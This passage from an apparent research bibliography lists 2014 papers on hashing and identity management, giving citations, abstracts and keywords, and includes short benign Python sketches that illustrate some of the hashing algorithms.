    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6839925&isnumber=6839906
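    A minimal Python sketch of the randomize-then-combine idea, assuming a simple index-prefix padding (the paper's three padding variants are not reproduced): each block is randomized independently, which is what makes the construction parallelizable, and the per-block digests are combined with XOR before a final hash:

      import hashlib
      from functools import reduce

      BLOCK = 64  # bytes per message block (an illustrative choice)

      def rtc_hash(message: bytes) -> str:
          blocks = [message[i:i + BLOCK] for i in range(0, len(message), BLOCK)] or [b""]
          # Randomize: bind each block to its position, then hash it.
          digests = [hashlib.sha1(i.to_bytes(8, "big") + b).digest()
                     for i, b in enumerate(blocks)]
          # Combine: XOR the per-block digests (order-independent), then
          # hash the result once more to produce the final value.
          combined = reduce(lambda x, y: bytes(a ^ b for a, b in zip(x, y)), digests)
          return hashlib.sha1(combined).hexdigest()

      print(rtc_hash(b"hello world" * 100))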
  • Pi-Chung Wang, "Scalable Packet Classification for Datacenter Networks," Selected Areas in Communications, IEEE Journal on , vol.32, no.1, pp.124,137, January 2014. The key challenge to a datacenter network is its scalability to handle many customers and their applications. In a datacenter network, packet classification plays an important role in supporting various network services. Previous algorithms store classification rules with the same length combinations in a hash table to simplify the search procedure. The search performance of hash-based algorithms is tied to the number of hash tables. To achieve fast and scalable packet classification, we propose an algorithm, encoded rule expansion, to transform rules into an equivalent set of rules with fewer distinct length combinations, without affecting the classification results. The new algorithm can minimize the storage penalty of transformation and achieve a short search time. In addition, the scheme supports fast incremental updates. Our simulation results show that more than 90% of the hash tables can be eliminated. The reduction of length combinations improves the speed of packet classification by an order of magnitude. The results also show that the software implementation of our scheme without using any hardware parallelism can support up to one thousand customer VLANs and one million rules, where each rule consumes less than 60 bytes and each packet classification can be accomplished under 50 memory accesses.
    Keywords: computer centers; firewalls; local area networks; telecommunication network routing; virtual machines; VLAN; classification rules; datacenter networks; encoded rule expansion; hardware parallelism; hash table; length combinations; packet classification; packet forwarding; storage penalty; Data structures; Decision trees; Encoding; Hardware; IP networks; Indexes; Software; Packet classification; VLANs; datacenter network; firewalls; packet forwarding; router architectures; scalability (ID#:14-2127)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6689489&isnumber=6689238
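    The underlying idea of hashing rules by their length combination can be sketched in Python as follows; the rules are hypothetical, and the paper's encoded rule expansion (which rewrites rules so that fewer distinct combinations, and hence fewer tables, remain) is only indicated in a comment:

      import ipaddress

      rules = [
          ("10.0.0.0/8",    "192.168.0.0/16", "allow"),
          ("10.1.0.0/16",   "192.168.1.0/24", "deny"),
          ("172.16.0.0/12", "0.0.0.0/0",      "allow"),
      ]

      # One hash table per (src-prefix-length, dst-prefix-length) combination.
      tables = {}
      for src, dst, action in rules:
          s, d = ipaddress.ip_network(src), ipaddress.ip_network(dst)
          tables.setdefault((s.prefixlen, d.prefixlen), {})[(s, d)] = action

      def classify(src_ip, dst_ip):
          # Search cost grows with the number of distinct length combinations;
          # encoded rule expansion rewrites rules so fewer combinations remain.
          matches = []
          for (sl, dl), table in tables.items():
              key = (ipaddress.ip_network("%s/%d" % (src_ip, sl), strict=False),
                     ipaddress.ip_network("%s/%d" % (dst_ip, dl), strict=False))
              if key in table:
                  matches.append(table[key])
          return matches

      print(classify("10.1.2.3", "192.168.1.7"))  # ['allow', 'deny']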
  • Kanizo, Y.; Hay, D.; Keslassy, I, "Maximizing the Throughput of Hash Tables in Network Devices with Combined SRAM/DRAM Memory," Parallel and Distributed Systems, IEEE Transactions on, vol. PP, no.99, pp.1, 1, April 2014. Hash tables form a core component of many algorithms as well as network devices. Because of their large size, they often require a combined memory model, in which some of the elements are stored in a fast memory (for example, cache or on-chip SRAM) while others are stored in much slower memory (namely, the main memory or off-chip DRAM). This makes the implementation of real-life hash tables particularly delicate, as a suboptimal choice of the hashing scheme parameters may result in a higher average query time, and therefore in a lower throughput. In this paper, we focus on multiple-choice hash tables. Given the number of choices, we study the tradeoff between the load of a hash table and its average lookup time. The problem is solved by analyzing an equivalent problem: the expected maximum matching size of a random bipartite graph with a fixed left-side vertex degree. Given two choices, we provide exact results for any finite system, and also deduce asymptotic results as the fast memory size increases. In addition, we further consider other variants of this problem and model the impact of several parameters. Finally, we evaluate the performance of our models on Internet backbone traces, and illustrate the impact of the memories speed difference on the choice of parameters. In particular, we show that the common intuition of entirely avoiding slow memory accesses by using highly efficient schemes (namely, with many fast-memory choices) is not always optimal.
    Keywords: Bipartite graph; Internet; Memory management; Performance evaluation; Random access memory; System-on-chip; Throughput (ID#:14-2128)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781627&isnumber=4359390
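    A toy Python model of the tradeoff studied here, with a d-choice hash table whose buckets stand in for fast memory and an overflow list standing in for slow memory; bucket count, capacity, and d are illustrative parameters:

      FAST_BUCKETS, BUCKET_CAP, CHOICES = 64, 4, 2
      fast = [[] for _ in range(FAST_BUCKETS)]
      slow = []  # stand-in for off-chip DRAM

      def insert(key):
          # Probe d=2 independent hash choices; take the least-loaded bucket.
          cands = [hash((key, i)) % FAST_BUCKETS for i in range(CHOICES)]
          best = min(cands, key=lambda b: len(fast[b]))
          if len(fast[best]) < BUCKET_CAP:
              fast[best].append(key)
          else:
              slow.append(key)  # a slow-memory access hurts average lookup time

      for k in range(300):
          insert(k)
      load = sum(len(b) for b in fast) / (FAST_BUCKETS * BUCKET_CAP)
      print(f"fast-memory load {load:.0%}, {len(slow)} keys spilled to slow memory")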
  • Plesca, Cezar; Morogan, Luciana, "Efficient And Robust Perceptual Hashing Using Log-Polar Image Representation," Communications (COMM), 2014 10th International Conference on , vol., no., pp.1,6, 29-31 May 2014. Robust image hashing seeks to transform a given input image into a shorter hashed version using a key-dependent non-invertible transform. These hashes find extensive applications in content authentication, image indexing for database search, and watermarking. Modern robust hashing algorithms consist of feature extraction, a randomization stage to introduce non-invertibility, followed by quantization and binary encoding to produce a binary hash. This paper describes a novel algorithm for generating an image hash based on Log-Polar transform features. The Log-Polar transform is a part of the Fourier-Mellin transformation, often used in image recognition and registration techniques due to its invariance properties under geometric operations. First, we show that the proposed perceptual hash is resistant to content-preserving operations such as compression, noise addition, and moderate geometric and filtering operations. Second, we illustrate the discriminative capability of our hash in order to rapidly distinguish between two perceptually different images. Third, we study the security of our method for image authentication purposes. Finally, we show that the proposed hashing method can provide both excellent security and robustness.
    Keywords: image authentication; log-polar transformation; multimedia security; perceptual hashing (ID#:14-2129)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866755&isnumber=6866648
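    A bare-bones Python sketch of a log-polar feature hash, assuming grayscale input as a 2-D list; the paper's key-dependent randomization, quantization, and encoding stages are reduced here to a simple mean-threshold binarization:

      import math

      def log_polar_hash(img, rings=8, wedges=16):
          h, w = len(img), len(img[0])
          cy, cx = h / 2, w / 2
          r_max = min(cy, cx) - 1
          feats = []
          for i in range(rings):      # log-spaced radii: this sampling grid is
              r = math.exp(math.log(r_max) * (i + 1) / rings)  # what gives the
              for j in range(wedges):                # rotation/scale robustness
                  theta = 2 * math.pi * j / wedges
                  y = min(max(int(cy + r * math.sin(theta)), 0), h - 1)
                  x = min(max(int(cx + r * math.cos(theta)), 0), w - 1)
                  feats.append(img[y][x])
          mean = sum(feats) / len(feats)
          return "".join("1" if f > mean else "0" for f in feats)

      img = [[(x * y) % 256 for x in range(64)] for y in range(64)]
      print(log_polar_hash(img))  # a 128-bit perceptual hash string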
  • Jin, Z.; Li, C.; Lin, Y.; Cai, D., "Density Sensitive Hashing," Cybernetics, IEEE Transactions on , vol. 44, no.8, pp.1362,1371, Aug. 2014. Nearest neighbor search is a fundamental problem in various research fields like machine learning, data mining and pattern recognition. Recently, hashing-based approaches, for example, locality sensitive hashing (LSH), have proved effective for scalable high dimensional nearest neighbor search. Many hashing algorithms have their theoretical roots in random projection. Since these algorithms generate the hash tables (projections) randomly, a large number of hash tables (i.e., long codewords) are required in order to achieve both high precision and recall. To address this limitation, we propose a novel hashing algorithm called density sensitive hashing (DSH) in this paper. DSH can be regarded as an extension of LSH. By exploring the geometric structure of the data, DSH avoids purely random projection selection and uses those projective functions which best agree with the distribution of the data. Extensive experimental results on real-world data sets have shown that the proposed method achieves better performance compared to the state-of-the-art hashing approaches.
    Keywords: Binary codes; Databases; Entropy; Nearest neighbor searches; Principal component analysis; Quantization (signal); Vectors; Clustering; locality sensitive hashing; random projection (ID#:14-2130)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645383&isnumber=6856256
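    For contrast, a short Python sketch of the random-projection LSH baseline that DSH refines; DSH would replace the random hyperplanes below with projections fitted to the data's geometric structure, which is not shown:

      import random

      DIM, BITS = 16, 8
      random.seed(0)
      planes = [[random.gauss(0, 1) for _ in range(DIM)] for _ in range(BITS)]

      def lsh_code(vec):
          """One bit per hyperplane: which side of the plane the point falls
          on. Nearby points tend to agree on most bits."""
          return tuple(int(sum(p * v for p, v in zip(plane, vec)) >= 0)
                       for plane in planes)

      a = [random.gauss(0, 1) for _ in range(DIM)]
      b = [x + random.gauss(0, 0.01) for x in a]       # a near neighbor of a
      ham = sum(x != y for x, y in zip(lsh_code(a), lsh_code(b)))
      print(f"Hamming distance between neighbors' codes: {ham}")  # usually 0 or 1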

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Identity Management

Identity Management


The term identity management refers to the management of individual identities, their roles, authentication, authorizations and privileges within or across systems. Examples include passwords, active directories, digital identities, tokens, and workflows. Identity management is one of the core competencies for cybersecurity, and the increasingly complex IT world demands smarter identity management solutions. The research presented here was published in the first half of 2014.

  • Talamo, Maurizio; Barchiesi, Maria Laura; Merella, Daniela; Schunck, Christian H., "Global Convergence In Digital Identity And Attribute Management: Emerging Needs For Standardization," ITU Kaleidoscope Academic Conference: Living in a converged world - Impossible without standards?, Proceedings of the 2014 , vol., no., pp.15,21, 3-5 June 2014. doi: 10.1109 In a converging world, where borders between countries are surpassed in the digital environment, it is necessary to develop systems that effectively replace "vis-à-vis" recognition with digital means of recognizing and identifying entities and people. In this work we summarize the current standardization efforts in the area of digital identity management. We identify a number of open challenges that need to be addressed in the near future to ensure the interoperability and usability of digital identity management services in an efficient and privacy-maintaining international framework. These challenges for standardization include: the management of identifiers for digital identities at the global level; attribute management, including attribute format, structure, and assurance; and procedures and protocols to link attributes to digital identities. Attention is drawn to key elements that should be considered in addressing these issues through standardization.
    Keywords: Authentication; Context; Educational institutions; Privacy; Standards; attribute management; authentication; authorization; digital identification; identity management; privacy (ID#:14-2131)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6858475&isnumber=6858455
  • Josang, A, "Identity Management And Trusted Interaction In Internet And Mobile Computing," Information Security, IET , vol.8, no.2, pp.67,79, March 2014. doi: 10.1049 The convergence of the Internet and mobile computing enables personalised access to online services anywhere and anytime. This potent access capability creates opportunities for new business models which stimulates vigorous investment and rapid innovation. Unfortunately, this innovation also produces new vulnerabilities and threats, and the new business models also create incentives for attacks, because criminals will always follow the money. Unless the new threats are balanced with appropriate countermeasures, growth in the Internet and mobile services will encounter painful setbacks. Security and trust are two fundamental factors for sustainable development of identity management in online markets and communities. The aim of this study is to present an overview of the central aspects of identity management in the Internet and mobile computing with respect to security and trust.
    Keywords: Internet; computer crime; investment; marketing data processing; mobile computing; security of data; trusted computing; Internet; business models; identity management; investment; mobile computing; mobile services; online markets; online services; potent access capability; security; sustainable development; trusted interaction (ID#:14-2132)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748541&isnumber=6748540
  • Faraji, M.; Joon-Myung Kang; Bannazadeh, H.; Leon-Garcia, A, "Identity Access Management For Multi-Tier Cloud Infrastructures," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,9, 5-9 May 2014. doi: 10.1109/NOMS.2014.6838229. This paper presents a novel architecture to manage identity and access (IAM) in a multi-tier cloud infrastructure, in which most services are supported by massive-scale data centers over the Internet. Multi-tier cloud infrastructure uses a tier-based model from software engineering to provide resources in different tiers. In this paper we focus on the design and implementation of a centralized identity and access management system for the multi-tier cloud infrastructure. First, we discuss identity and access management requirements in such an environment and propose our solution to address these requirements. Next, we discuss approaches to improve performance of the IAM system and make it scalable to billions of users. Finally, we present experimental results based on the current deployment in the SAVI Testbed. We show that our IAM system outperforms previously proposed IAM systems for cloud infrastructure by a factor of 9 in throughput when the number of users is small, and handles about 50 times more requests at peak usage. Because our architecture combines green threads and load-balanced processes, it uses fewer system resources and easily scales up to handle a high number of requests.
    Keywords: authorisation; cloud computing; IAM system; centralized identity access management; green-thread process; load balanced process; multitier cloud infrastructures; Authentication; Authorization; Cloud computing; Computer architecture (ID#:14-2133)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838229&isnumber=6838210
  • Khatri, P., "Using Identity And Trust With Key Management For Achieving Security In Ad Hoc Networks," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.271,275, 21-22 Feb. 2014. doi: 10.1109/IAdCC.2014.6779333 Communication in a mobile ad hoc network is done over a shared wireless channel with no central authority (CA) to monitor it. Nodes in the network are held responsible for maintaining the integrity and secrecy of data. To attain the goal of trusted communication in a MANET (mobile ad hoc network), many approaches using key management have been implemented. This work proposes a composite identity and trust based model (CIDT) that depends on the public key, physical identity, and trust of a node, which helps in secure data transfer over wireless channels. CIDT is a modified DSR routing protocol for achieving security. The trust factor of a node, along with its key pair and identity, is used to authenticate it in the network. The experience-based trust factor (TF) of a node is used to decide its authenticity. A valid certificate is generated for an authentic node to carry out communication in the network. The proposed method works well with the self-certification scheme of a node in the network.
    Keywords: data communication; mobile ad hoc networks; routing protocols; telecommunication security; wireless channels; MANET; ad hoc networks; central authority; data integrity; data secrecy; experience based trust factor; identity model; key management; mobile ad hoc network; modified DSR routing protocol; physical identity; public key; secure data transfer; security; self certification scheme; shared wireless channel; trust factor; trust model; trusted communication; wireless channels; Artificial neural networks; Mobile ad hoc networks; Protocols; Public key; Servers; Certificate; MANET; Public key; Secret key; Trust Model (ID#:14-2134)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779333&isnumber=6779283
  • Pura, Mihai Lica; Buchs, Didier, "A Self-Organized Key Management Scheme For Ad Hoc Networks Based On Identity-Based Cryptography," Communications (COMM), 2014 10th International Conference on , vol., no., pp.1,4, 29-31 May 2014. doi: 10.1109/ICComm.2014.6866683 Ad hoc networks represent a very modern technology for providing communication between devices without the need of any prior infrastructure setup, and thus in an "on the spot" manner. But there is a catch: so far there isn't any security scheme that would suit the ad hoc properties of this type of network and that would also accomplish the needed security objectives. The most promising proposals are the self-organized schemes. This paper presents a work in progress aiming at developing a new self-organized key management scheme that uses identity-based cryptography to render impossible some of the attacks that can be performed on the schemes proposed so far, while preserving their advantages. The paper starts with a survey of the most important self-organized key management schemes and a short analysis of the advantages and disadvantages they have. Then, it presents our new scheme, and by using informal analysis, it presents the advantages it has over the other proposals.
    Keywords: ad hoc networks; identity based cryptography; key management; security; self-organization (ID#:14-2135)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866683&isnumber=6866648
  • Kobayashi, F.; Talburt, J.R., "Decoupling Identity Resolution from the Maintenance of Identity Information," Information Technology: New Generations (ITNG), 2014 11th International Conference on, vol., no., pp.349, 354, 7-9 April 2014. doi: 10.1109/ITNG.2014.88 The EIIM model for ER allows for creation and maintenance of persistent entity identity structures. It accomplishes this through a collection of batch configurations that allow updates and asserted fixes to be made to the identity knowledgebase (IKB). The model also provides a batch IR configuration that performs no maintenance activity but instead allows access to the identity information. This batch IR configuration is limited in a few ways. It is driven by the same rules used for maintaining the IKB, has no inherent method to identify "close" matches, and can only identify and return the positive matches. Through the decoupling of this configuration and its movement into an interactive role under the umbrella of an Identity Management Service, a more robust access method can be provided for the use of identity information. This more robust access to the information improves the quality of the information along multiple Information Quality dimensions.
    Keywords: information retrieval; knowledge based systems; quality management; EIIM model; ER; IKB; batch IR configuration; decoupling identity resolution; entity identity structures; identity information; identity knowledge base; identity management service; information quality; robust information access; Context; Erbium; Maintenance engineering; Organizations; Robustness; Synchronization; Entity Resolution; Identity Life Cycle Management; Identity Management Service; Information Quality; Interactive Identity Resolution (ID#:14-2136)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822222&isnumber=6822158
  • Ahmad, A; Hassan, M.M.; Aziz, A, "A Multi-token Authorization Strategy for Secure Mobile Cloud Computing," Mobile Cloud Computing, Services, and Engineering (MobileCloud), 2014 2nd IEEE International Conference on , vol., no., pp.136,141, 8-11 April 2014. doi: 10.1109/MobileCloud.2014.21 Cloud computing is an emerging paradigm shifting the shape of computing models from being a technology to a utility. However, security, privacy and trust are amongst the issues that can subvert the benefits and hence wide deployment of cloud computing. With the introduction of omnipresent mobile-based clients, the ubiquity of the model increases, suggesting a still higher integration in life. Nonetheless, the security issues rise to a higher degree as well. The constrained input methods for credentials and the vulnerable wireless communication links are among the factors giving rise to serious security issues. To strengthen the access control of cloud resources, organizations now commonly acquire Identity Management Systems (IdM). This paper shows that the most popular IdM, namely OAuth, as used in mobile cloud computing, has many weaknesses in its authorization architecture. In particular, the authors find two major issues in the current IdM. First, if the IdM system is compromised through malicious code, it allows a hacker to gain authorization to all the protected resources hosted on a cloud. Second, all the communication links among the client, cloud, and IdM carry the complete authorization token, which can allow a hacker, through traffic interception at any communication link, illegitimate access to protected resources. We also suggest a solution to the reported problems, and justify our arguments with experimentation and mathematical modeling.
    Keywords: authorization; cloud computing; data privacy; mathematical analysis; mobile computing; radio links; security of data; IdM; OAuth; access control; authorization architecture; cloud resources; computing models; credentials; hacker; identity management systems; malicious code; mathematical modeling; multitoken authorization strategy; omnipresent mobile-based clients; privacy; secure mobile cloud computing; security; traffic interception; trust; vulnerable wireless communication links; Authorization; Cloud computing; Computer hacking; Mobile communication; Organizations; Servers; Cloud Computing Security; Identity Management System; Mobile Cloud Computing; Modified Identity Management System; Secure Mobile Computing (ID#:14-2137)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834955&isnumber=6823830
  • Musgrove, J.; Cukic, B.; Cortellessa, V., "Proactive Model-Based Performance Analysis and Security Tradeoffs in a Complex System," High-Assurance Systems Engineering (HASE), 2014 IEEE 15th International Symposium on , vol., no., pp.211,215, 9-11 Jan. 2014. doi: 10.1109/HASE.2014.37 Application domains in which early performance evaluation is needed are becoming more complex. In addition to traditional measures of complexity due, for example, to the number of components, their interactions, complicated control coordination and schemes, emerging applications may require adaptive response and reconfiguration the impact of externally observable (security) parameters. In this paper we introduce an approach for effective modeling and analysis of performance and security tradeoffs. The approach identifies a suitable allocation of resources that meet performance requirements, while maximizing measurable security effects. We demonstrate this approach through the analysis of performance sensitivity of a Border Inspection Management System (BIMS) with changing security mechanisms (e.g. biometric system parameters for passenger identification). The final result is a model-based approach that allows us to take decisions about BIMS performance and security mechanisms on the basis of rates of traveler arrivals and traveler identification security guarantees. We describe the experience gained when applying this approach to daily flight arrival schedule of a real airport.
    Keywords: resource allocation; security of data; sensitivity analysis; BIMS; border inspection management system; complex system; complicated control coordination; early performance evaluation; externally observable security parameters; measurable security effect maximization; model-based approach; performance sensitivity analysis; proactive model-based performance analysis; resource allocation; security tradeoff mechanisms; traveler arrival rate; traveler identification security guarantees; Airports; Analytical models; Atmospheric modeling; Biological system modeling; Inspection; Magnetic resonance; Security; Border security; Identity management; Performance - security tradeoff; Performance modeling (ID#:14-2138)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6754608&isnumber=6754569
  • Ching-Kun Chen; Chun-Liang Lin; Shyan-Lung Lin; Yen-Ming Chiu; Cheng-Tang Chiang, "A Chaotic Theoretical Approach to ECG-Based Identity Recognition [Application Notes]," Computational Intelligence Magazine, IEEE , vol.9, no.1, pp.53,63, Feb. 2014. doi: 10.1109/MCI.2013.2291691 Sophisticated technologies realized from applying the idea of biometric identification are increasingly applied in entrance security management systems, private document protection, and security access control. Common biometric identification involves voice, attitude, keystroke, signature, iris, face, palm or fingerprints, etc. Still, there are novel identification technologies based on the individual's biometric features under development.
    Keywords: biometrics (access control); chaos; electrocardiography; pattern recognition; ECG-based identity recognition; biometric features; biometric identification; chaotic theoretical approach; electrocardiography; entrance security management system; private document protection; security access control; Access control; Biomedical monitoring; Biometrics; Electrocardiography; Fingerprint recognition; Identity management (ID#:14-2139)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6710250&isnumber=6710231
  • Slomovic, A, "Privacy Issues in Identity Verification," Security & Privacy, IEEE , vol.12, no.3, pp.71,73, May-June 2014. doi: 10.1109/MSP.2014.52 Identity verification plays an important role in creating trust in the economic system. It can, and should, be done in a way that doesn't decrease individual privacy. This article explores privacy issues in identity verification for commercial applications. It does not explore questions about when and to what degree identity verification is needed or address broader issues related to national or other wide-scale identity systems.
    Keywords: business data processing; data privacy; commercial applications; economic system; identity verification; national identity systems; privacy issues; trust creation; wide-scale identity systems; Biometrics (access control);Computer security; Data privacy; Identification; Identity management; Knowledge management; Verification; KBA; biometrics; identity credential; identity document fraud; identity document security; identity fraud; identity proofing; identity scoring; identity verification; imposter fraud; knowledge-based authentication; privacy (ID#:14-2140)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6837386&isnumber=6824513
  • Adjei, J.K., "Explaining the Role of Trust in Cloud Service Acquisition," Mobile Cloud Computing, Services, and Engineering (MobileCloud), 2014 2nd IEEE International Conference on , vol., no., pp.283,288, 8-11 April 2014. doi: 10.1109/MobileCloud.2014.48 An effective digital identity management system is a critical enabler of cloud computing, since it supports the provision of the required assurances to the transacting parties. Such assurances sometimes require the disclosure of sensitive personal information. Given the prevalence of various forms of identity abuse on the Internet, a re-examination of the factors underlying cloud services acquisition has become critical and imperative. In order to provide better assurances, parties to cloud transactions must have confidence in service providers' ability and integrity in protecting their interests and personal information. Thus a trusted cloud identity ecosystem could promote such user confidence and assurances. Using a qualitative research approach, this paper explains the role of trust in cloud service acquisition by organizations. The paper focuses on the processes of acquisition of cloud services by financial institutions in Ghana. The study forms part of a comprehensive study on the monetization of personal identity information.
    Keywords: cloud computing; data protection; trusted computing; Ghana; Internet; cloud computing; cloud services acquisition; cloud transactions; digital identity management system; financial institutions; identity abuses; interest protection; organizations; personal identity information; sensitive personal information; service provider ability; service provider integrity; transacting parties; trusted cloud identity ecosystem; user assurances; user confidence; Banking; Cloud computing; Context; Law; Organizations; Privacy; cloud computing; information privacy; mediating; trust (ID#:14-2141)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834977&isnumber=6823830
  • Albino Pereira, A; Bosco M.Sobral, J.; Merkle Westphall, C., "Towards Scalability for Federated Identity Systems for Cloud-Based Environments," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30 2014-April 2 2014. doi: 10.1109/NTMS.2014.6814055 As multi-tenant authorization and federated identity management systems for cloud computing mature, the provisioning of services using this paradigm allows maximum efficiency for businesses that require access control. However, regarding scalability support, mainly horizontal, some characteristics of those approaches based on central authentication protocols are problematic. The objective of this work is to address these issues by providing an adapted sticky-session mechanism for a Shibboleth architecture using CAS. This alternative, compared with the recommended shared-memory approach, showed improved efficiency and lower overall infrastructure complexity.
    Keywords: authorization; cloud computing; cryptographic protocols; CAS; Shibboleth architecture; central authentication protocols; central authentication service; cloud based environments; cloud computing; federated identity management systems; federated identity system scalability; multitenant authorization; sticky session mechanism; Authentication; Cloud computing; Proposals; Scalability; Servers; Virtual machining (ID#:14-2142)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814055&isnumber=6813963
  • Friese, I; Heuer, J.; Ning Kong, "Challenges from the Identities of Things: Introduction of the Identities of Things discussion group within Kantara initiative," Internet of Things (WF-IoT), 2014 IEEE World Forum on , vol., no., pp.1,4, 6-8 March 2014. doi: 10.1109/WF-IoT.2014.6803106 The Internet of Things (IoT) is becoming reality. But its restrictions become obvious as we try to connect solutions of different vendors and communities. Apart from communication protocols, appropriate identity management mechanisms are crucial for a growing IoT. The recently founded Identities of Things Discussion Group within the Kantara Initiative will work on open issues and solutions to manage "Identities of Things" as an enabler for a fast-growing ecosystem.
    Keywords: Internet of Things; authorisation; data privacy; Identities of Things discussion group; Internet of Things; IoT; Kantara Initiative; authentication; authorization; communication protocols; data privacy; identity management mechanisms; Authentication; Authorization; Companies; Internet; Object recognition; Protocols; Sensors; Kantara Initiative; authentication; authorization; identifier; identity; name service; privacy (ID#:14-2143)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6803106&isnumber=6803102
  • Ben Bouazza, N.; Lemoudden, M.; El Ouahidi, B., "Surveying the Challenges And Requirements For Identity In The Cloud," Security Days (JNS4), Proceedings of the 4th Edition of National , vol., no., pp.1,5, 12-13 May 2014. doi: 10.1109/JNS4.2014.6850127 Cloud technologies are increasingly important for IT departments, allowing them to concentrate on strategy as opposed to maintaining data centers; one of the biggest advantages of the cloud is the ability to share computing resources between multiple providers, especially in hybrid clouds, to overcome infrastructure limitations. User identity federation is considered the second major risk in the cloud, and since business organizations use multiple cloud service providers, IT departments face a range of constraints. Multiple attempts to solve this problem have been suggested, such as federated identity, which has a number of advantages despite suffering from challenges that are common in new technologies. The following paper tackles federated identity, its components, advantages, and disadvantages, and then proposes a number of useful scenarios for managing identity in a hybrid cloud infrastructure.
    Keywords: cloud computing; security of data; business organizations; cloud service providers; cloud technologies; computing resource sharing; data centers; federated identity management; hybrid clouds; user identity federation; Access control; Authentication; Cloud computing; Computational modeling; Computers; Organizations; Access control; Claim; Cloud; Federated identity; Federation provider; Identity provider; SaaS; Security; Token (ID#:14-2144)
    URL: http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6850127&queryText%3DBen+Bouazza
  • Patricia Arias Cabarcos, Florina Almenarez, Felix Gomez Marmol, Andres Marin, "To Federate or Not To Federate: A Reputation-Based Mechanism to Dynamize Cooperation in Identity Management," Wireless Personal Communications: An International Journal, Volume 75 Issue 3, April 2014, Pages 1769-1786. doi: 10.1007/s11277-013-1338-y Identity Management systems cannot be centralized anymore. Nowadays, users have multiple accounts, profiles and personal data distributed throughout the web and hosted by different providers. However, the online world is currently divided into identity silos forcing users to deal with repetitive authentication and registration processes and hindering a faster development of large scale e-business. Federation has been proposed as a technology to bridge different trust domains, allowing user identity information to be shared in order to improve usability. But further research is required to shift from the current static model, where manual bilateral agreements must be pre-configured to enable cooperation between unknown parties, to a more dynamic one, where trust relationships are established on demand in a fully automated fashion. This paper presents IdMRep, the first completely decentralized reputation-based mechanism which makes dynamic federation a reality. Initial experiments demonstrate its accuracy as well as an assumable overhead in scenarios with and without malicious nodes.
    Keywords: Cooperative systems, Identity federation, Identity management, Trust and reputation management (ID#:14-2145)
    URL: http://dx.doi.org/10.1007/s11277-013-1338-y or http://dl.acm.org/citation.cfm?id=2598716.2598732&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367
  • Zhiwei Wang, Guozi Sun, Danwei Chen, "A New Definition Of Homomorphic Signature For Identity Management In Mobile Cloud Computing," Journal of Computer and System Sciences, Volume 80 Issue 3, May, 2014, Pages 546-553. doi: 10.1016/j.jcss.2013.06.010 In this paper, we define a new homomorphic signature for identity management in mobile cloud computing. A mobile user first computes a full signature on all his sensitive personal information (SPI), and stores it in a trusted third party (TTP). During the valid period of his full signature, if the user wants to call a cloud service, he should authenticate himself to the cloud service provider (CSP) through the TTP. In our scheme, the mobile user only needs to send a {0,1}^n vector to the access controlling server (TTP). The access controlling server, which does not know the secret key, can compute a partial signature on a small part of the user's SPI, and then sends it to the CSP. We give a formal security definition of this homomorphic signature, and construct a scheme from the GHR signature. We prove that our scheme is secure under the GHR signature.
    Keywords: GHR signature, Homomorphic signature, Identity management, Mobile cloud computing (ID#:14-2146)
    URL: http://dx.doi.org/10.1016/j.jcss.2013.06.010 or http://dl.acm.org/citation.cfm?id=2567015.2567375&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367
  • Nathaniel J. Fuller / Maxine S. Cohen, "A Contextual Model For Identity Management (IDM) Interfaces," Doctoral Dissertation, Nova Southeastern University (c)2014, ISBN: 978-1-303-76101-0. The usability of Identity Management (IdM) systems is highly dependent upon design that simplifies the processes of identification, authentication, and authorization. Recent findings reveal two critical problems that degrade IdM usability: (1) unfeasible techniques for managing various digital identifiers, and (2) ambiguous security interfaces. The rapid growth of online services consisting of various identifier concepts and indistinct designs overwhelms users and disrupts desired computing activities. These complexities have led to an increase in work operations and additional effort for end users. This work focused on these challenges towards developing a contextual model that enhanced IdM usability. The context of this model provided users with preapproved identification and technical features for managing digital identifiers. A sample population of military and government participants was surveyed to capture their relative computing characteristics and end user requirements for IdM and identifiers. Characteristics such as Ease of Access Management, Cognitive Overload, Identifier Selection, Confidentiality, and Trust were recorded and measured by means of their frequency of occurrence. A standard deviation was utilized for assessing the volatility of the results. Conclusive results were successfully integrated into an attribute-based architecture so that the contextual model's algorithm, which was the contribution of this work, could be utilized for interpreting requirement attributes for defining end user IdM parameters for business applications. Usability inspection results illustrated that the model's algorithm was able to reduce cognitive overloads and disruptions in workflow by limiting recognition, recall, and convenience values of end users.
    Keywords: (not provided) (ID#:14-2147)
    URL: http://dl.acm.org/citation.cfm?id=2604216&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367
